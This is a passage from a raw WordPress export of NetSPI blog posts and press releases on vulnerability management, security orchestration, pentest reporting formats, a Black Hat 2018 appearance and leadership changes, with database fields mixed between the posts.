Let’s take a look at each one:

Duplicate vulnerabilities: This happens so easily. You’re using a SAST and a DAST tool for scanners. Your SAST and DAST tools both report an XSS vulnerability on the same asset, so your team receives multiples tickets for the same issue. Or, let’s say you run a perimeter scan and PCI penetration test on the same IP range as your vulnerability management team. Both report the same missing patch, and your organization receives duplicate tickets for remediation. If this only happened once, no big deal. But when scaled to multiple sites and thousands of vulnerabilities identified, duplicate vulnerabilities create significant excess labor for already busy remediation teams. The result: contention across departments and slower remediation.

False positives: False positives create extra work, can cause teams to feel they’re chasing ghosts, and reduce confidence in security testing reports. Couple them with duplicate vulnerabilities, and the problems multiply. For example, say your security team reports a vulnerability from their SAST tool. The development team researches it and provides verification information as to why this vulnerability is a false positive. The security team marks it as a false positive, and everyone moves on. Then your security team runs their DAST tool. The same vulnerability is found and reported to the development team who then does the same research and provides the same information as to why this same vulnerability is still a false positive. Now you have extra work as well as the possibility of animosity between security and development teams.

Why Do These Problems Happen—And How Can You Stop It?

The answer that many security scanners offer is a walled garden solution, or closed platforms. In other words, these security tools cannot ingest vulnerabilities outside of their solution suite. This approach may benefit the security solution vendor, but it hamstrings your security teams. Organizations reliant on these platforms are unable to select among best-in-breed security tools for specific purposes, or they risk losing a single, coherent view of their vulnerabilities enterprise wide.

NetSPI recommends finding a vulnerability orchestration platform provider that can ensure choice while still delivering a single source of record for all vulnerabilities. Using a platform that can automatically aggregate, normalize, correlate and prioritize vulnerabilities allows organizations to retain the agility to test emerging technologies using commercially owned, open source, or even home-grown security tools. Not only will this minimize the challenges caused by data silos, but it can allow security teams to get more testing done, more quickly.

When we built NetSPI Resolve™, our own vulnerability orchestration platform, we built it to eliminate walled gardens. The development of the platform began almost twenty years ago and is the first commercially available security testing automation and vulnerability correlation software platform that empowers you to reduce the time required to identify and remediate vulnerabilities. As a technology-enabled service provider, we didn’t want to limit our testers to specific tools. NetSPI Resolve empowers our testers to choose the best tools and technology. More than that, because NetSPI Resolve can ingest and integrate data from multiple tools, it also provides our testers with comprehensive, automated reporting, ticketing, and SLA management. By reducing or eliminating the time for these kinds of tasks,

NetSPI Resolve allowed testers to do what they do best – test.

Data silos aren’t inevitable, but they are common. Knocking them down will go a long way towards reducing your organization’s cybersecurity risk posture by decreasing your overall time to remediate.

Learn more about vulnerability orchestration and NetSPI Resolve:

[post_title] => Data Silos: Are They Really a Problem? [post_excerpt] => Data silos happen naturally for many reasons. As an organization grows and their security maturity evolves, they’ll likely end up with one or more of these scenarios. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => data-silos-are-they-really-a-problem [to_ping] => [pinged] => [post_modified] => 2022-07-08 01:58:55 [post_modified_gmt] => 2022-07-08 06:58:55 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspi.staging.wpengine.com/?p=1745 [menu_order] => 350 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [64] => WP_Post Object ( [ID] => 1718 [post_author] => 91 [post_date] => 2018-10-15 07:00:43 [post_date_gmt] => 2018-10-15 07:00:43 [post_content] =>

Stories of new data breaches grab headlines again and again. Many of these breaches are the result of known vulnerabilities left un-remediated, and in some cases, organizations have been aware of these vulnerabilities for years. Why weren’t these problems fixed sooner? Wouldn't organizations try to fix them as soon as possible to avoid a breach?

Every organization strives to fix vulnerabilities rapidly. Unfortunately, fixing vulnerabilities is a complex task.

First, organizations are flooded with vulnerabilities. New vulnerabilities are reported daily and the volume is only increasing. Keeping pace is tough.

Second, there's no single pane of glass for tracking all vulnerabilities. Organizations use multiple scanners to detect vulnerabilities, each living in its own walled garden. Application and network vulnerabilities are treated separately, typically in disconnected systems. Vulnerabilities discovered via pentesting may only reside in reports. Detective control tests find weaknesses in security tools, and auditing tools find vulnerabilities in configurations – and these results may not align with scan results. Unifying multiple sources in a central location, and normalizing the results for accurate tracking, is a big challenge.

Third, even if you have all vulnerabilities in a single pane, remediation processes vary and take time. Application vulnerabilities must go through the software development life cycle (SDLC), while network vulnerabilities have their own workflow. Identifying the right asset owner can be a challenge because CMDB information is often inaccurate. Configuration changes usually need to go through a change control board process, and patches need to be widely deployed across a large number of devices. There is little margin for error: fixing 99% of your vulnerabilities is great, but all it takes is that last 1% to cause a major breach.

On average, for every vulnerability patched, organizations lose 12 days coordinating across multiple teams. Contributing factors include:

  • Use of emails and spreadsheets to manage patching processes (57%)
  • No common view of systems and applications to be patched (73%)
  • No easy way to track if patching occurs in a timely manner (62%)

Fourth, many security organizations spend an inordinate amount of time focused on regulatory compliance. It’s critically important for your organization to build a strong, business-aligned security program that meets regulatory compliance standards. When a program is built to simply “check the box” of compliance, the results are inefficient, insecure, and not aligned with the business.

Finally, and most importantly, sheer human effort is not enough to overcome the vulnerability challenge because organizations don't have enough talent or resources. A solid vulnerability management program requires talent focused on security, development, and operations – three skill-sets that are in high demand. Cybersecurity is experiencing negative unemployment; IT operations is fully occupied maintaining up-time; and developers are immersed in the agile SDLC.

We see common challenges in organizations of all sizes and across many industries. In the coming articles in this series, we'll share our experiences and provide suggestions on how you can solve these challenges!

[post_title] => Recurring Vulnerability Management Challenges That Can't Be Ignored [post_excerpt] => Stories of new data breaches grab headlines again and again. Many of these breaches are the result of known vulnerabilities left un-remediated, and in some cases, organizations have been aware of these vulnerabilities for years. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => recurring-vulnerability-management-challenges [to_ping] => [pinged] => [post_modified] => 2021-04-14 10:37:41 [post_modified_gmt] => 2021-04-14 10:37:41 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspi.staging.wpengine.com/?p=1718 [menu_order] => 352 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [65] => WP_Post Object ( [ID] => 1697 [post_author] => 91 [post_date] => 2018-09-28 07:00:14 [post_date_gmt] => 2018-09-28 07:00:14 [post_content] =>

Here at NetSPI, we see firsthand the struggles enterprises face to fix vulnerabilities. It’s concerning when our pentesters and customers continue to find the same vulnerabilities that have yet to be remediated – at the same client, year after year.

The struggle faced by enterprises in managing vulnerabilities is not limited to manual penetration testing results. Scanners find millions of vulnerabilities in our customer environments, and we see the sheer volume overwhelming their remediation efforts. Even if 99% of assets can be fixed within a reasonable time-frame, a dangerous window of opportunity is allowed to persist if the last 1% lingers.

We're taking action to help our customers solve this challenge. Fortunately, we have a solid foundation from which to tackle the problem.

Our own penetration testing platform, NetSPI Resolve 6, was built for the purpose of managing our own penetration testing process. The Resolve software platform has given NetSPI the competitive edge in pentesting by allowing our pentesters to spend more time on testing and less time on overhead tasks.

Resolve works by:

  1. Ingesting vulnerabilities from any source: scanners and manual pentesting reports
  2. Normalizing the definition of the vulnerabilities to a standard rubric
  3. Correlating the vulnerabilities to de-duplicate and compress the findings
  4. Automatically generating reports

Customers have approached us about whether they could use Resolve in their own environments to help them conquer their challenges. We agreed. Since that time, we've licensed the use of the Resolve platform to the benefit many organizations, especially those with pentesters.

Now we're taking the next step. You see, Resolve wasn't built for vulnerability management and orchestration, which is the key need facing the majority of our customers.

So we're leveraging the great features of Resolve 6 we at NetSPI use to manage pentesting and expanding the platform to serve the larger vulnerability management and orchestration market. For the past year, we've been rebuilding the Resolve platform for the next generation, Resolve 7.

Resolve 7 will be a service-oriented architecture that scales to the massive data needs of our customers. It will be web-based, using a virtual appliance for easy deployment. We are adding more administration features, such as field-level role-based access control (RBAC) permissions, granular security groups, and single-sign on (SSO) support, to make the platform enterprise-ready out of the box. We've added a vulnerability orchestration component with an integration engine to complement the powerful vulnerability correlation engine. And we're building a new user interface with expanded capabilities for reporting and business intelligence visualizations.

We're building Resolve 7 for you - so you can help stem the tide of your vulnerability flood. We'll showcase new features of Resolve in coming posts, so stay tuned.

Contact us for more information about the availability of NetSPI Resolve 7.0.

[post_title] => What's Next and New with NetSPI Resolve [post_excerpt] => Here at NetSPI, we see firsthand the struggles enterprises face to fix vulnerabilities. It’s concerning when our pentesters and customers continue to find the same vulnerabilities that have yet to be remediated – at the same client, year after year. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => whats-next-and-new-with-netspi-resolve [to_ping] => [pinged] => [post_modified] => 2021-04-14 00:57:49 [post_modified_gmt] => 2021-04-14 00:57:49 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspi.staging.wpengine.com/?p=1697 [menu_order] => 354 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [66] => WP_Post Object ( [ID] => 1670 [post_author] => 91 [post_date] => 2018-09-14 07:00:42 [post_date_gmt] => 2018-09-14 07:00:42 [post_content] =>

Previously, we discussed best practices for tracking vulnerability data through to remediation. In this post, we're explore the challenge of streamlining human penetration testing (pentesting) data into the vulnerability orchestration process. We provide three best practices you can use when engaging a third-party pentesting company to ensure the pentesting data is delivered in a way that is compatible with your security orchestration process.

Pentesting is an essential threat and vulnerability management process used to discover some of the most important vulnerabilities in your environment. Human pentesters find vulnerabilities that scanners can't catch, but an attacker will find. The challenge often becomes how to track and remediate those vulnerabilities after the test is complete.

Two Challenges of Pentesting Data for Security Orchestration

Vulnerability scanners use known data formats that don't change often, which is easy to incorporate into security orchestration tools. Once you've integrated your scan results into a vulnerability orchestration process and normalized them, you have some confidence that the process will continue to work as designed. In comparison, pentesters often do not follow a known data format and may add information to the report, in addition to the specific findings.

Findings from third-party penetration testing companies often arrive as a static report in PDF format. This format makes it difficult to streamline those results in an automated way when you expect a standard input. Some reports may come with a CSV file of the findings, which provides a more structured data format, but correlating those findings with existing vulnerabilities may require manual review.

The pentesting company’s report may include custom information. This documents the vendor's work and shows they did more than a scan, it presents problems for streamlining that data into an orchestrated process - especially if the information must be enriched before sending it to the remediation resources. For instance, the remediation recommendations or the described business impact may not align with your corporate policy. You may disagree with their severity assessment, for example, because you have more knowledge of the asset's importance or mitigating factors in your environment.

Three Best Practices for Pentest Data Compatibility

Receiving formatted, structured pentest results from a penetration testing company allows you to streamline your vulnerability orchestration process and track the findings through to remediation. The following three best practices can help align the pentest data with your organization’s process.

Provide a template for your expected data format. The data format for the pentest findings must be predefined for your vulnerability orchestration and automation to work properly. You know your format, but the pentesting company doesn't. Share your format prior to engaging the vendor to ensure they will accommodate your requirements. The best pentesting company will be able to deliver the results in a structured format that's customized for you.

Provide a reference rubric with IDs for your common vulnerability types. Consider your normalization requirements for vulnerability definitions. If you've standardized the common ones, provide a reference rubric that can be added to the results. This rubric will allow you to correlate the test results with an associated reference directly to an existing definition. Once you've put the formatted, structured pentest results into your orchestration process, you can track to remediation.

Provide a retest template. When submitting a retest request, ensure that the vendor's output matches an expected format so you can automate the data marking for closing the vulnerabilities that have been verified. This might be the same format you started with, or it might be a simpler retest template for the vendor to fill out.

These three best practices can help you ensure the pentesting data is compatible with your vulnerability orchestration process.

Next Steps

Read the earlier posts in this series:

[post_title] => How to Streamline Pentest Data to Security Orchestration [post_excerpt] => Previously, we discussed best practices for tracking vulnerability data through to remediation. In this post, we're explore the challenge of streamlining human penetration testing (pentesting) data into the vulnerability orchestration process. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => how-to-streamline-penetest-data-to-security-orchestration [to_ping] => [pinged] => [post_modified] => 2021-04-14 00:57:44 [post_modified_gmt] => 2021-04-14 00:57:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspi.staging.wpengine.com/?p=1670 [menu_order] => 358 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [67] => WP_Post Object ( [ID] => 1654 [post_author] => 91 [post_date] => 2018-08-31 07:00:53 [post_date_gmt] => 2018-08-31 07:00:53 [post_content] =>

Vulnerability data must be tracked in order to ensure remediation - or vulnerabilities can fall through the cracks leaving your organization exposed. Most vulnerability data comes from scanners, though the most important vulnerability data often comes from humans. In this third post of a four-part series on threat and vulnerability management tools, we provide guidance on how to effectively track vulnerability data in the context of orchestration.

Several non-optimized tools commonly used for tracking vulnerability remediation include the following, each of which has significant limitations:

Excel and SharePoint: Companies often use Excel or SharePoint to track remediation from a central list of findings - a single spreadsheet file where dozens of users comb through thousands of vulnerabilities. Tracking remediation this way certainly presents challenges, because spreadsheet tools are not designed to help manage such complicated data sets and team collaboration. The information often gets overwritten or marked improperly. The accuracy of the data is questionable, making reporting difficult.

JIRA: Alternately, some companies use JIRA for tracking software vulnerabilities, which helps ensure that processes are followed. Unfortunately, most organizations have many JIRA instances across their development environments. Distributing the results across many JIRA instances leads to an inability to effectively report on the data. Storing the results in a central JIRA system has advantages, but getting stakeholders to take the time to login and review the findings in a different system than they use daily can be difficult.

ServiceNow: Some companies attempt to use ServiceNow, which has the advantage of more robust ticketing, to track vulnerabilities on the networking side. Unfortunately, some of the same ingestion challenges exist, and you lose the fidelity of having all of the vulnerabilities in a single place.

Home-built: Other companies have built systems that connect to other internal systems. While they work, home-built tools are difficult to maintain and often are maintained less formally than normal development efforts, as they are unrelated to the core business purpose. These systems are often just databases with a minimal user interface, not fully optimized for the purpose.

Best Practices Checklist: Security Orchestration for Vulnerability Remediation

Best practices for threat and vulnerability management require a system for remediation workflows that can handle the following seven tasks:

  1. Ingestion of various data formats with flexible normalization
  2. Reviewing of normalized data for changes and modifications as needed
  3. Distribution of normalized data to various external systems
  4. Tracking the data distributed externally to keep a central listing up to date
  5. Ensuring policy is adhered to across the various systems where the data is tracked
  6. Sending notifications for users and keeping humans involved in the process, especially when vulnerabilities become overdue
  7. Reporting on the outcome of vulnerabilities by group, business unit, or globally across the organization

As a result, a checklist for a security orchestration tool for vulnerability remediation includes these six capabilities:

  1. Serve as a central clearinghouse of vulnerability data
  2. Automate many steps of the remediation process
  3. Coordinate varying processes based on the organization's internal structure and environment
  4. Integrate with a large number of systems via API
  5. Define a workflow with decision points based on data criteria
  6. Notify key users when something is not right

Make sure any threat and vulnerability management tool you consider can check these six boxes before you try it out.

Next Steps

Read the earlier posts in this series:

[post_title] => How to Track Vulnerability Data and Remediation Workflow [post_excerpt] => Vulnerability data must be tracked in order to ensure remediation - or vulnerabilities can fall through the cracks leaving your organization exposed. Most vulnerability data comes from scanners, though the most important vulnerability data often comes from humans. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => how-to-track-vulnerability-data-and-remediation-workflow [to_ping] => [pinged] => [post_modified] => 2021-04-14 07:02:15 [post_modified_gmt] => 2021-04-14 07:02:15 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspi.staging.wpengine.com/?p=1654 [menu_order] => 360 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [68] => WP_Post Object ( [ID] => 1644 [post_author] => 91 [post_date] => 2018-08-17 07:00:57 [post_date_gmt] => 2018-08-17 07:00:57 [post_content] =>

In the post Are You Flooded with Vulnerabilities?, we explored the ever-growing mountain of data that organizations face in managing their vulnerabilities. While software is at the root of the vulnerability problem, it's also the solution. As individuals approach large volumes of data, software can support better decision making, collaboration, tracking, and visualization.

The key to a mature threat and vulnerability management program is to set up and consistently follow an established process that tracks each vulnerability throughout its life cycle. Given a best-practices process, the challenge becomes its real-world implementation. Two important capabilities work together to help you implement your process in the real world: automation and security orchestration.

Watch Our Webinar

How Does Automation Work?

Automation eliminates the normal human effort to accomplish a task. Simple, commonplace tasks, such as retrieving data or opening a ticket can be automated. A script encodes a task for software to complete.

However, automation is not a complete solution. When humans operate automation routines, the process tends to break down quickly - and the cost of overhead adds up. Clunky, manual steps may remain, and humans running the automation routines make mistakes. Tribal knowledge tends to get lost over time and consistency is difficult to achieve. This is where security orchestration comes to the rescue.

What is Security Orchestration?

Let's first explore the term. Security orchestration connects multiple systems and automation in a way that provides a consistent process for data to follow. Orchestration is, for example, an automated car assembly line where multiple robots each help build the vehicle as it advances through the manufacturing process. But robots alone are not enough. Like an automation script, each robot only does a specific task. Building a reliable car also requires the overall coordination of individual tasks, which is called orchestration.

At inflection points, decisions can be made on individual records automatically, based on data. Automation scripts can be triggered to perform complex data-parsing tasks. Tool integrations allow for automated data retrieval and synchronization among systems. When human analysis is needed, the process can wait for human input.

Beyond consistent implementation, an even greater benefit of a security orchestration platform is that it allows you to minimize the human overhead and maximize the human capacity for analysis.

Differences Between Security Orchestration and Automation

In review of the differences, here are the points you need to understand when determining if a tool does orchestration, automation, or both:

AutomationSecurity Orchestration
  • The tool can be configured to calculate values based on input variables
  • The tool can make decisions and perform different actions based on those decisions
  • The tool can connect to various external system APIs
  • The tool can pause and wait
  • The tool can create or update large data sets from various sources
  • The tool can execute sequential automation routines over a time period
  • The tool can run scripts or routines in some format
  • The tool allows configuration of automation steps, decisions, and pauses within a custom workflow
[post_title] => Security Orchestration vs. Automation: What's the Difference? [post_excerpt] => In the post Are You Flooded with Vulnerabilities?, we explored the ever-growing mountain of data that organizations face in managing their vulnerabilities. While software is at the root of the vulnerability problem, it's also the solution. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => orchestration-vs-automation-whats-the-difference [to_ping] => [pinged] => [post_modified] => 2021-04-14 07:02:23 [post_modified_gmt] => 2021-04-14 07:02:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspi.staging.wpengine.com/?p=1644 [menu_order] => 362 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [69] => WP_Post Object ( [ID] => 13198 [post_author] => 91 [post_date] => 2018-08-03 07:00:25 [post_date_gmt] => 2018-08-03 07:00:25 [post_content] => NetSPI LLC, the leader in orchestrated vulnerability management and security testing, announced today its participation at Black Hat USA 2018, Aug. 8-9 (booth 1643) in Las Vegas, NV. NetSPI will both present and exhibit at the conference to showcase their solutions that improve an organization’s security posture. Event attendees will have the opportunity to see first-hand how NetSPI’s portfolio is designed to address the most critical vulnerability challenges that security organizations face. NetSPI’s security experts will be providing best practices and insights during their presentations and will also be available to meet 1:1. To schedule your sessions, click here. NetSPI’s presentations at Black Hat USA include: PowerUpSQL: A PowerShell Tooklit for Attacking SQL Servers in Enterprise Environments: When:  Thursday, Aug. 9, 2018 at 10:00 a.m. Where:  Business Hall (Oceanside), Arsenal Station 4 Who: Scott Sutherland and Antti Rantasaari of NetSPI Session Summary: This session includes training on functions supporting SQL Server discovery, weak configuration auditing, privilege escalation on scale, and post exploitation actions such as OS command execution. The tool includes additional functions used by administrators to quickly inventory the SQL Servers in their Active Directory Server (ADS) domains, and perform common threat hunting tasks related to SQL Server. PowerUpSQL enables red, blue, and purple team in automating day to day tasks involving SQL Server. Mainframe [z/OS] Reverse Engineering and Exploit Development: When:  Thursday, Aug. 9, 2018 at 3:50 p.m. Where:  Jasmine Ballroom Who:  Chad Rikansrud, NetSPI’s Mainframe Partner of RSM Partners Session Summary: Talk to a Fortune 500® who is running mainframe and they'll tell you two things: (1) without their mainframes they'd be out of business, and (2) they do not conduct any security research on them, let alone vulnerability scans. This session is focused on providing various tools that exist on the platform to help you in doing your own reverse engineering, followed by detailed steps on how to start your own exploit development. In addition to these presentations, attendees will have the opportunity to learn more about the following: Application & Infrastructure Security Testing Services:  See how NetSPI’s security testing services are designed to address bandwidth, expertise gaps, and compliance needs. NetSPI provides penetration testing services encompassing everything from mobile and web apps to cloud, network, mainframe, IoT, and more. Additional strategic services include Threat & Vulnerability Management Assessments, and attack simulation services which encompasses red team, social engineering, detective controls testing, and more. NetSPI Resolve™ Vulnerability Orchestration Software: Learn how NetSPI Resolve removes the risk of managing vulnerabilities in spreadsheets, and arduous administrative tasks that cause large-scale inefficiencies. The software provides a system of record for all application and infrastructure vulnerabilities through its scanner-agnostic integration engine that also brokers cross-departmental workflow and communications. NetSPI Resolve reduces your risk by providing the visibility needed to actively manage your remediation efforts while increasing your security testing coverage by over fifty percent without adding additional staff. Click here to sign up for a 1:1 security advisory session or a software demo.

About NetSPI

NetSPI LLC is the leading provider of application and network security testing solutions that support organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes program development, security testing, and a software platform for application and infrastructure vulnerability orchestration. Trusted by seven of the top 10 United States banks, two global cloud providers, and many of the Fortune® 500, NetSPI has deep expertise in financial institutions, healthcare providers, retailers, and technology companies. NetSPI is headquartered in Minneapolis, Minnesota with additional offices in Dallas, Denver, Portland, and New York. For more information about NetSPI, please visit netspi.com. [post_title] => NetSPI to Present and Exhibit at Black Hat USA 2018 [post_excerpt] => NetSPI LLC, the leader in orchestrated vulnerability management and security testing, announced today its participation at Black Hat USA 2018, Aug. 8-9 (booth 1643) in Las Vegas, NV. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-to-present-and-exhibit-at-black-hat-usa-2018 [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:54:05 [post_modified_gmt] => 2021-04-14 06:54:05 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=netspi_news&p=13198 [menu_order] => 364 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [70] => WP_Post Object ( [ID] => 1609 [post_author] => 91 [post_date] => 2018-07-27 07:00:02 [post_date_gmt] => 2018-07-27 07:00:02 [post_content] =>

Most organizations have more vulnerabilities than can be fixed at current resource levels. Halfway through 2018 the NVD is on pace to match the historic 20,000 published CVEs in 2017.

A perfect storm of circumstances can make it difficult for your threat and vulnerability management program to maintain a good security posture. Multiple scanners are required to get full coverage, which in turn piles on the work. The sheer quantity of patches, configuration changes, and code changes is daunting. Automated patch management solutions are limited by the risk of downtime, so human intervention is required for many configuration and code changes.

The growth of the cybercrime industry requires companies to accelerate the vulnerability fix cycle. Exploits come out ever faster, as malicious actors take advantage of known vulnerabilities that organizations have not yet fixed.

Organizations that prioritize vulnerabilities based on risk will maximize security resources. There's no perfect intelligence on new exploits, and lessening the risk doesn't mean the risk is gone. However, risk-based approaches to threat and vulnerability management offer the best path forward when vulnerabilities pile up and resources are limited.

Keeping up with a blizzard of vulnerabilities and exploits requires closing the remediation gap, or the time to remediation. The fundamental challenge lies in expedient remediation for every fix. Your organization will want to get through a litany of remediation workflows quickly to minimize effort. Nonetheless, every vulnerability requires decision and possible subsequent effort.

Five Phases of the Vulnerability Management Process

We recommend your organization implement the following five-phase vulnerability management process in managing the vulnerability life cycle:

  1. Discovery
  2. Correlation & enrichment
  3. Verification
  4. Prioritization
  5. Remediation

In addition, these five goals help document each phase of the vulnerability management lifecycle:

  • Identify the key stakeholders and systems involved
  • Determine what policies have bearing in each phase
  • Define the inflection points where a decision must be made
  • Define the junctures where communication must occur
  • Establish output destinations for the data flow

Move a Mountain of Vulnerabilities

Processes that look good on paper may break down in the face of real world challenges. In your organization, different departments may own responsibility for remediation, and they each may use separate systems. Uptime may be prioritized quietly over patch management without notification of exception requests. Code changes need to be vetted in the software development life cycle (SDLC) before being released into production. Configuration changes need to be evaluated for potential impact to running systems.

Implementation of a complete vulnerability management process is a challenge that is made easier by security orchestration tools – a topic for a future post. Defining a complete security orchestration process will help you move mountains.

[post_title] => Are You Flooded With Vulnerabilities? [post_excerpt] => Do you have more vulnerabilities piling up than you can fix with current resources? Time to remediation lengthens as volume grows. Organizations that prioritize vulnerabilities based on risk will maximize security resources and results, so we recommend this five-phase process to manage the vulnerability life cycle. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => flooded-with-vulnerabilities [to_ping] => [pinged] => [post_modified] => 2021-04-14 07:02:30 [post_modified_gmt] => 2021-04-14 07:02:30 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspi.staging.wpengine.com/?p=1609 [menu_order] => 365 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [71] => WP_Post Object ( [ID] => 13190 [post_author] => 91 [post_date] => 2018-03-07 07:00:59 [post_date_gmt] => 2018-03-07 07:00:59 [post_content] =>

NetSPI LLC, the leading security testing and vulnerability orchestration company, today announced a new professional services line delivering Threat and Vulnerability Management Program Development. This new offering expands NetSPI’s professional services and leverages the power of the NetSPI Resolve™ software platform.

As the threat landscape grows in complexity, NetSPI remains committed to helping clients solve the vulnerability management challenge. Enterprises are overwhelmed with application and infrastructure vulnerabilities and have identified the need for a solution that expands beyond technical testing. NetSPI’s solution helps customers evolve from tactical and reactive penetration testing to a proactive program that reduces risk to their business.

“Our clients are faced with a constantly changing attack surface and new emerging threats every day. We created this offering to help them build a program to quickly identify and fix the vulnerabilities most impactful to their business,” said Charles Horton, senior vice president of professional services.

While many service providers offer solutions focusing broadly on overall security strategy or narrowly focused segments of the challenge, we address vulnerability management holistically.

Deke George
CEO

NetSPI’s service is designed to help clients evaluate and understand how well they are managing technical vulnerabilities and reducing risk. Their Threat and Vulnerability Management Program Framework evaluates programs in a consistent manner, providing maturity evaluation and a roadmap for continuous improvement. NetSPI focuses on seven foundational elements that must work in concert to address the vulnerability management challenge and reduce risk:

  • Asset Management
  • Configuration Management
  • Secure Software Development
  • Vulnerability and Patch Management
  • Technical Testing
  • Threat Intelligence and Monitoring
  • Incident Response

“While many service providers offer solutions focusing broadly on overall security strategy or narrowly focused segments of the challenge, we address vulnerability management holistically,” said Deke George, NetSPI chief executive officer. “NetSPI is an industry leader in the technical testing space, and this service builds upon that expertise to better strategically serve our clients.”

To learn more about this service, more information can be found here.  On March 8, 2018 at 1:00 p.m. CST NetSPI is hosting an educational webinar on this topic and will provide attendees tools, techniques and best practices for assessing their organization’s security maturity. Register today at https://www.netsp.com/research/cybersecurity-webinars.

About NetSPI

NetSPI LLC is the leading provider of application and network security testing solutions that support organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes program development, security testing, and a software platform for application and infrastructure vulnerability orchestration. Trusted by seven of the top 10 United States banks, two global cloud providers, and many of the Fortune® 500, NetSPI has deep expertise in financial institutions, healthcare providers, retailers, and technology companies. NetSPI is headquartered in Minneapolis, Minnesota with additional offices in Dallas, Denver, Portland, and New York. For more information about NetSPI, please visit netspi.com.

[post_title] => NetSPI Announces New Advisory Services Focused on Threat and Vulnerability Management [post_excerpt] => Empowering organizations with a pragmatic approach to address their vulnerability management challenges across their entire environment. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-announces-new-advisory-services-focused-on-threat-and-vulnerability-management [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:56:43 [post_modified_gmt] => 2021-04-14 06:56:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=netspi_news&p=13190 [menu_order] => 382 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [72] => WP_Post Object ( [ID] => 13188 [post_author] => 91 [post_date] => 2017-11-20 07:00:28 [post_date_gmt] => 2017-11-20 07:00:28 [post_content] =>

Minneapolis, Minnesota  –  ​​​​NetSPI LLC, the leading​ provider of enterprise security testing and vulnerability correlation software, announced leadership appointments and restructuring initiatives today to accelerate product innovation and strategic growth. NetSPI is intensifying its focus in high-growth security and vulnerability management areas while positioning to accelerate long-term market growth, driving customer value, and ultimately making the company more efficient and profitable.

“The announcements today are critical in NetSPI’s transformational journey,” said Deke George, CEO, NetSPI. “Our transformation began with our new logo and website design acting as visual cues letting our employees, clients, and partners know that it is a new day at NetSPI. These key leadership appointments create the foundation needed for the next iteration of growth.”

In addition to the new brand, NetSPI appointed leadership talent to strengthen the structure for exponential growth and long-term market adoption. Ensuring an innovative, customer-centric approach, NetSPI announced president and chief operating officer, Aaron Shilts. With 20 years of experience in cybersecurity and operations, Shilts brings valuable leadership during a period of rapid transformation. Prior to joining NetSPI, Shilts led worldwide services for Optiv and FishNet Security. Over his 14-year tenure, he steered the organization to deliver customer success, sustained growth and profitability. Shilts’ leadership team includes Pavan Gorakavi as senior vice president of software engineering, Steve Antone as vice president of sales, Mary Braunwarth as vice president of marketing, and Joshua Scott as vice president of product management. These structural changes highlight NetSPI’s commitment to drive the evolution of their world-class threat and vulnerability portfolio, while demonstrating foundational measurements of client success.

Our transformation began with our new logo and website design acting as visual cues letting our employees, clients, and partners know that it is a new day at NetSPI. These key leadership appointments create the foundation needed for the next iteration of growth.

Deke George
CEO, NetSPI

Among those praising these changes is NetSPI’s executive chairman of the board, Scott Hammack. “Myself and Sunstone commend Deke and the team on what they’ve built,” Hammack stated. “We are looking forward to building on the established blueprint and enhancing the vision and strategy of the organization to maximize the organization’s growth.”

Read more about NetSPI’s leadership team.

About NetSPI

NetSPI is the leading provider of application and network security testing solutions that support organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes both security testing services and a software platform for application and infrastructure vulnerability orchestration. Trusted by seven of the top 10 United States banks, two global cloud providers, and many of the Fortune® 500, NetSPI has deep expertise in financial institutions, healthcare providers, retailers, and technology companies. NetSPI is headquartered in Minneapolis, MN with additional offices in Dallas, Denver, Portland, and New York.  For more information about NetSPI, please visit netspi.com.

About Sunstone Partners

Sunstone Partners is a private equity firm focused on growth equity and growth buyout investments in technology-enabled services businesses. The firm was formed by the spin-out of the growth equity team of Trident Capital, an investment firm with $1.9 billion of capital under management, since 1993. The firm is currently investing out of Sunstone Partners I, LP, a $310 million fund. For more information visit https://www.sunstonepartners.com.

[post_title] => NetSPI Announces Senior Leadership Appointments to Catapult Growth [post_excerpt] => NetSPI is intensifying its focus in high-growth security and vulnerability management areas while positioning to accelerate long-term market growth. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-announces-senior-leadership-appointments-to-catapult-growth [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:56:50 [post_modified_gmt] => 2021-04-14 06:56:50 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=netspi_news&p=13188 [menu_order] => 393 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [73] => WP_Post Object ( [ID] => 13181 [post_author] => 91 [post_date] => 2017-04-18 07:00:42 [post_date_gmt] => 2017-04-18 07:00:42 [post_content] =>

